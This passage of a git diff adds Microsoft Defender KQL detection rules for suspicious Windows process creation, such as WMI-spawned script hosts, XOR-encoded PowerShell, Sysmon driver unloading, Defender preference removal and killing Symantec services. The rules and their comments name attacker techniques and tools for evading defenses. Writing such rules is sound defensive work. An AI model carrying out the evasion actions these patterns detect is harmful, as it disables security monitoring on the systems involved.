+// MITRE Tactic: Execution
+// Tags: attack.t1204.002, attack.t1047, attack.t1218.010, attack.execution, attack.defense-evasion
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and ((ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "msiexec" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "verclsid" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (ProcessCommandLine contains "process" and ProcessCommandLine contains "create" and ProcessCommandLine contains "call")) and (FolderPath endswith "\\wbem\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_wmiprvse_child_process.kql b/KQL/rules/windows/process_creation/suspicious_wmiprvse_child_process.kql
new file mode 100644
index 00000000..b128404b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_wmiprvse_child_process.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious WmiPrvSE Child Process
+// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects suspicious and uncommon child processes of WmiPrvSE
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1047, attack.t1204.002, attack.t1218.010
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\wbem\\WmiPrvSE.exe" and ((FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wscript.exe") or ((ProcessCommandLine contains "cscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript") and FolderPath endswith "\\cmd.exe")) and (not(((ProcessCommandLine contains "/i " and FolderPath endswith "\\msiexec.exe") or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WmiPrvSE.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_workstation_locking_via_rundll32.kql b/KQL/rules/windows/process_creation/suspicious_workstation_locking_via_rundll32.kql
new file mode 100644
index 00000000..7981e74c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_workstation_locking_via_rundll32.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Workstation Locking via Rundll32
+// Author: frack113
+// Date: 2022-06-04
+// Level: medium
+// Description: Detects a suspicious call to the user32.dll function that locks the user workstation
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+//   - Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "user32.dll," and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\cmd.exe" and ProcessCommandLine contains "LockWorkStation"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_x509enrollment_process_creation.kql b/KQL/rules/windows/process_creation/suspicious_x509enrollment_process_creation.kql
new file mode 100644
index 00000000..f4de1526
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_x509enrollment_process_creation.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious X509Enrollment - Process Creation
+// Author: frack113
+// Date: 2022-12-23
+// Level: medium
+// Description: Detect use of X509Enrollment
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1553.004
+// False Positives:
+//   - Legitimate administrative script
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "X509Enrollment.CBinaryConverter" or ProcessCommandLine contains "884e2002-217d-11da-b2a4-000e7bbb2b09"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_xor_encoded_powershell_command.kql b/KQL/rules/windows/process_creation/suspicious_xor_encoded_powershell_command.kql
new file mode 100644
index 00000000..c421d7f0
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_xor_encoded_powershell_command.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious XOR Encoded PowerShell Command
+// Author: Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali
+// Date: 2018-09-05
+// Level: medium
+// Description: Detects presence of a potentially xor encoded powershell command
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1140, attack.t1027
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ForEach" or ProcessCommandLine contains "for(" or ProcessCommandLine contains "for " or ProcessCommandLine contains "-join " or ProcessCommandLine contains "-join'" or ProcessCommandLine contains "-join\"" or ProcessCommandLine contains "-join`" or ProcessCommandLine contains "::Join" or ProcessCommandLine contains "[char]") and ProcessCommandLine contains "bxor" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or ProcessVersionInfoFileDescription =~ "Windows PowerShell" or ProcessVersionInfoProductName =~ "PowerShell Core 6")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_zipexec_execution.kql b/KQL/rules/windows/process_creation/suspicious_zipexec_execution.kql
new file mode 100644
index 00000000..7b76e407
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_zipexec_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious ZipExec Execution
+// Author: frack113
+// Date: 2021-11-07
+// Level: medium
+// Description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/generic:Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip" and ProcessCommandLine contains "/pass:" and ProcessCommandLine contains "/user:") or (ProcessCommandLine contains "/delete" and ProcessCommandLine contains "Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/syncappvpublishingserver_execute_arbitrary_powershell_code.kql b/KQL/rules/windows/process_creation/syncappvpublishingserver_execute_arbitrary_powershell_code.kql
new file mode 100644
index 00000000..40ece80f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/syncappvpublishingserver_execute_arbitrary_powershell_code.kql
@@ -0,0 +1,12 @@
+// Title: SyncAppvPublishingServer Execute Arbitrary PowerShell Code
+// Author: frack113
+// Date: 2021-07-12
+// Level: medium
+// Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - App-V clients
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\"n; " and (FolderPath endswith "\\SyncAppvPublishingServer.exe" or ProcessVersionInfoOriginalFileName =~ "syncappvpublishingserver.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql b/KQL/rules/windows/process_creation/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql
new file mode 100644
index 00000000..2086b083
--- /dev/null
+++ b/KQL/rules/windows/process_creation/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql
@@ -0,0 +1,10 @@
+// Title: SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code
+// Author: frack113
+// Date: 2021-07-16
+// Level: medium
+// Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.t1216
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\SyncAppvPublishingServer.vbs" and ProcessCommandLine contains ";"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/sysinternals_psservice_execution.kql b/KQL/rules/windows/process_creation/sysinternals_psservice_execution.kql
new file mode 100644
index 00000000..17ebc6de
--- /dev/null
+++ b/KQL/rules/windows/process_creation/sysinternals_psservice_execution.kql
@@ -0,0 +1,12 @@
+// Title: Sysinternals PsService Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-16
+// Level: medium
+// Description: Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.discovery, attack.persistence, attack.t1543.003
+// False Positives:
+//   - Legitimate use of PsService by an administrator
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "psservice.exe" or (FolderPath endswith "\\PsService.exe" or FolderPath endswith "\\PsService64.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/sysinternals_pssuspend_execution.kql b/KQL/rules/windows/process_creation/sysinternals_pssuspend_execution.kql
new file mode 100644
index 00000000..f133c883
--- /dev/null
+++ b/KQL/rules/windows/process_creation/sysinternals_pssuspend_execution.kql
@@ -0,0 +1,10 @@
+// Title: Sysinternals PsSuspend Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-23
+// Level: medium
+// Description: Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.discovery, attack.persistence, attack.t1543.003
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "pssuspend.exe" or (FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/sysinternals_pssuspend_suspicious_execution.kql b/KQL/rules/windows/process_creation/sysinternals_pssuspend_suspicious_execution.kql
new file mode 100644
index 00000000..6e39985e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/sysinternals_pssuspend_suspicious_execution.kql
@@ -0,0 +1,12 @@
+// Title: Sysinternals PsSuspend Suspicious Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-23
+// Level: high
+// Description: Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "msmpeng.exe" and (ProcessVersionInfoOriginalFileName =~ "pssuspend.exe" or (FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/sysmon_configuration_update.kql b/KQL/rules/windows/process_creation/sysmon_configuration_update.kql
new file mode 100644
index 00000000..d48c7077
--- /dev/null
+++ b/KQL/rules/windows/process_creation/sysmon_configuration_update.kql
@@ -0,0 +1,12 @@
+// Title: Sysmon Configuration Update
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-09
+// Level: medium
+// Description: Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Legitimate administrators might use this command to update Sysmon configuration.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-c" or ProcessCommandLine contains "/c" or ProcessCommandLine contains "–c" or ProcessCommandLine contains "—c" or ProcessCommandLine contains "―c") and ((FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\Sysmon.exe") or ProcessVersionInfoFileDescription =~ "System activity monitor")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql b/KQL/rules/windows/process_creation/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql
new file mode 100644
index 00000000..8b36d4fa
--- /dev/null
+++ b/KQL/rules/windows/process_creation/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql
@@ -0,0 +1,10 @@
+// Title: Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE
+// Author: frack113
+// Date: 2021-12-16
+// Level: high
+// Description: Detects usage of "findstr" with the argument "385201". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1518.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " 385201" and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/sysmon_driver_unloaded_via_fltmc_exe.kql b/KQL/rules/windows/process_creation/sysmon_driver_unloaded_via_fltmc_exe.kql
new file mode 100644
index 00000000..cbf2e305
--- /dev/null
+++ b/KQL/rules/windows/process_creation/sysmon_driver_unloaded_via_fltmc_exe.kql
@@ -0,0 +1,12 @@
+// Title: Sysmon Driver Unloaded Via Fltmc.EXE
+// Author: Kirill Kiryanov, oscd.community
+// Date: 2019-10-23
+// Level: high
+// Description: Detects possible Sysmon filter driver unloaded via fltmc.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070, attack.t1562, attack.t1562.002
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "unload" and ProcessCommandLine contains "sysmon") and (FolderPath endswith "\\fltMC.exe" or ProcessVersionInfoOriginalFileName =~ "fltMC.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/sysprep_on_appdata_folder.kql b/KQL/rules/windows/process_creation/sysprep_on_appdata_folder.kql
new file mode 100644
index 00000000..a6d9a25b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/sysprep_on_appdata_folder.kql
@@ -0,0 +1,12 @@
+// Title: Sysprep on AppData Folder
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-06-22
+// Level: medium
+// Description: Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+//   - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\AppData\\" and FolderPath endswith "\\sysprep.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/system_disk_and_volume_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/system_disk_and_volume_reconnaissance_via_wmic_exe.kql
new file mode 100644
index 00000000..19edcb23
--- /dev/null
+++ b/KQL/rules/windows/process_creation/system_disk_and_volume_reconnaissance_via_wmic_exe.kql
@@ -0,0 +1,12 @@
+// Title: System Disk And Volume Reconnaissance Via Wmic.EXE
+// Author: Stephen Lincoln '@slincoln-aiq' (AttackIQ)
+// Date: 2024-02-02
+// Level: medium
+// Description: An adversary might use WMI to discover information about the system, such as the volume name, size,
+// free space, and other disk information. This can be done using the 'wmic' command-line utility and has been
+// observed being used by threat actors such as Volt Typhoon.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.discovery, attack.t1047, attack.t1082
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " volumename" or ProcessCommandLine contains " logicaldisk") or (ProcessCommandLine contains "path" and ProcessCommandLine contains "win32_logicaldisk") or (ProcessCommandLine contains " volume" and ProcessCommandLine contains " list ")) and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/system_file_execution_location_anomaly.kql b/KQL/rules/windows/process_creation/system_file_execution_location_anomaly.kql
new file mode 100644
index 00000000..3f7329a8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/system_file_execution_location_anomaly.kql
@@ -0,0 +1,10 @@
+// Title: System File Execution Location Anomaly
+// Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2017-11-27
+// Level: high
+// Description: Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\atbroker.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certreq.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\consent.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\dashost.exe" or FolderPath endswith "\\defrag.exe" or FolderPath endswith "\\dfrgui.exe" or FolderPath endswith "\\dism.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\dllhst3g.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\logonui.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\ntoskrnl.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\runonce.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\taskhostw.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\userinit.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\werfaultsecure.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\winver.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wsmprovhost.exe") and (not(((FolderPath startswith "C:\\$WINDOWS.~BT\\" or FolderPath startswith "C:\\$WinREAgent\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\uus\\" or FolderPath startswith "C:\\Windows\\WinSxS\\") or ((FolderPath contains "C:\\Program Files\\PowerShell\\7\\" or FolderPath contains "C:\\Program Files\\PowerShell\\7-preview\\" or FolderPath contains "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview" or FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview") and FolderPath endswith "\\pwsh.exe") or (FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\" and FolderPath endswith "\\wsl.exe" and FolderPath startswith "C:\\Users\\'") or (FolderPath endswith "\\wsl.exe" and (FolderPath startswith "C:\\Program Files\\WindowsApps\\MicrosoftCorporationII.WindowsSubsystemForLinux" or FolderPath startswith "C:\\Program Files\\WSL\\"))))) and (not(FolderPath contains "\\SystemRoot\\System32\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/system_information_discovery_via_registry_queries.kql b/KQL/rules/windows/process_creation/system_information_discovery_via_registry_queries.kql
new file mode 100644
index 00000000..e060abbd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/system_information_discovery_via_registry_queries.kql
@@ -0,0 +1,12 @@
+// Title: System Information Discovery via Registry Queries
+// Author: lazarg
+// Date: 2025-06-12
+// Level: low
+// Description: Detects attempts to query system information directly from the Windows Registry.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains "Get-ItemPropertyValue" or ProcessCommandLine contains "gpv") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (ProcessCommandLine contains "query" and (ProcessCommandLine contains "-v" or ProcessCommandLine contains "/v" or ProcessCommandLine contains "–v" or ProcessCommandLine contains "—v" or ProcessCommandLine contains "―v") and FolderPath endswith "\\reg.exe")) and (ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows Defender" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" or ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation" or ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Services")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/system_network_connections_discovery_via_net_exe.kql b/KQL/rules/windows/process_creation/system_network_connections_discovery_via_net_exe.kql
new file mode 100644
index 00000000..03433c29
--- /dev/null
+++ b/KQL/rules/windows/process_creation/system_network_connections_discovery_via_net_exe.kql
@@ -0,0 +1,10 @@
+// Title: System Network Connections Discovery Via Net.EXE
+// Author: frack113
+// Date: 2021-12-10
+// Level: low
+// Description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1049
+
+DeviceProcessEvents
+| where ((ProcessCommandLine endswith " use" or ProcessCommandLine endswith " sessions") or (ProcessCommandLine contains " use " or ProcessCommandLine contains " sessions ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/tamper_windows_defender_remove_mppreference.kql b/KQL/rules/windows/process_creation/tamper_windows_defender_remove_mppreference.kql
new file mode 100644
index 00000000..b6835f6a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/tamper_windows_defender_remove_mppreference.kql
@@ -0,0 +1,12 @@
+// Title: Tamper Windows Defender Remove-MpPreference
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-05
+// Level: high
+// Description: Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Legitimate PowerShell scripts
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Remove-MpPreference" and (ProcessCommandLine contains "-ControlledFolderAccessProtectedFolders " or ProcessCommandLine contains "-AttackSurfaceReductionRules_Ids " or ProcessCommandLine contains "-AttackSurfaceReductionRules_Actions " or ProcessCommandLine contains "-CheckForSignaturesBeforeRunningScan ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/tap_installer_execution.kql b/KQL/rules/windows/process_creation/tap_installer_execution.kql
new file mode 100644
index 00000000..aeabdbf9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/tap_installer_execution.kql
@@ -0,0 +1,12 @@
+// Title: Tap Installer Execution
+// Author: Daniil Yugoslavskiy, Ian Davis, oscd.community
+// Date: 2019-10-24
+// Level: medium
+// Description: Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048
+// False Positives:
+//   - Legitimate OpenVPN TAP installation
+
+DeviceProcessEvents
+| where FolderPath endswith "\\tapinstall.exe" and (not(((FolderPath contains ":\\Program Files\\Avast Software\\SecureLine VPN\\" or FolderPath contains ":\\Program Files (x86)\\Avast Software\\SecureLine VPN\\") or FolderPath contains ":\\Program Files\\OpenVPN Connect\\drivers\\tap\\" or FolderPath contains ":\\Program Files (x86)\\Proton Technologies\\ProtonVPNTap\\installer\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/taskkill_symantec_endpoint_protection.kql b/KQL/rules/windows/process_creation/taskkill_symantec_endpoint_protection.kql
new file mode 100644
index 00000000..6d768a6a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/taskkill_symantec_endpoint_protection.kql
@@ -0,0 +1,12 @@
+// Title: Taskkill Symantec Endpoint Protection
+// Author: Ilya Krestinichev, Florian Roth (Nextron Systems)
+// Date: 2022-09-13
+// Level: high
+// Description: Detects one of the possible scenarios for disabling Symantec Endpoint Protection.
+// Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.
+// As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "taskkill" and ProcessCommandLine contains " /F " and ProcessCommandLine contains " /IM " and ProcessCommandLine contains "ccSvcHst.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/taskmgr_as_local_system.kql b/KQL/rules/windows/process_creation/taskmgr_as_local_system.kql
new file mode 100644
index 00000000..983a3725
--- /dev/null
+++ b/KQL/rules/windows/process_creation/taskmgr_as_local_system.kql
@@ -0,0 +1,10 @@
+// Title: Taskmgr as LOCAL_SYSTEM
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-03-18
+// Level: high
+// Description: Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where FolderPath endswith "\\taskmgr.exe" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/tasks_folder_evasion.kql b/KQL/rules/windows/process_creation/tasks_folder_evasion.kql
new file mode 100644
index 00000000..45b379a0
--- /dev/null
+++ b/KQL/rules/windows/process_creation/tasks_folder_evasion.kql
@@ -0,0 +1,12 @@
+// Title: Tasks Folder Evasion
+// Author: Sreeman
+// Date: 2020-01-13
+// Level: high
+// Description: The Tasks folder in system32 and syswow64 are globally writable paths.
+// Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application
+// in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.execution, attack.t1574.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "echo " or ProcessCommandLine contains "copy " or ProcessCommandLine contains "type " or ProcessCommandLine contains "file createnew") and (ProcessCommandLine contains " C:\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains " C:\\Windows\\SysWow64\\Tasks\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/terminal_service_process_spawn.kql b/KQL/rules/windows/process_creation/terminal_service_process_spawn.kql
new file mode 100644
index 00000000..1c04ad35
--- /dev/null
+++ b/KQL/rules/windows/process_creation/terminal_service_process_spawn.kql
@@ -0,0 +1,10 @@
+// Title: Terminal Service Process Spawn
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-05-22
+// Level: high
+// Description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, attack.lateral-movement, attack.t1210, car.2013-07-002
+
+DeviceProcessEvents
+| where (InitiatingProcessCommandLine contains "\\svchost.exe" and InitiatingProcessCommandLine contains "termsvcs") and (not(((FolderPath endswith "\\rdpclip.exe" or FolderPath endswith ":\\Windows\\System32\\csrss.exe" or FolderPath endswith ":\\Windows\\System32\\wininit.exe" or FolderPath endswith ":\\Windows\\System32\\winlogon.exe") or isnull(FolderPath))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/time_travel_debugging_utility_usage.kql b/KQL/rules/windows/process_creation/time_travel_debugging_utility_usage.kql
new file mode 100644
index 00000000..5bf2459b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/time_travel_debugging_utility_usage.kql
@@ -0,0 +1,12 @@
+// Title: Time Travel Debugging Utility Usage
+// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
+// Date: 2020-10-06
+// Level: high
+// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.t1218, attack.t1003.001
+// False Positives:
+//   - Legitimate usage by software developers/testers
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\tttracer.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/tor_client_browser_execution.kql b/KQL/rules/windows/process_creation/tor_client_browser_execution.kql
new file mode 100644
index 00000000..f4a77dd9
--- /dev/null
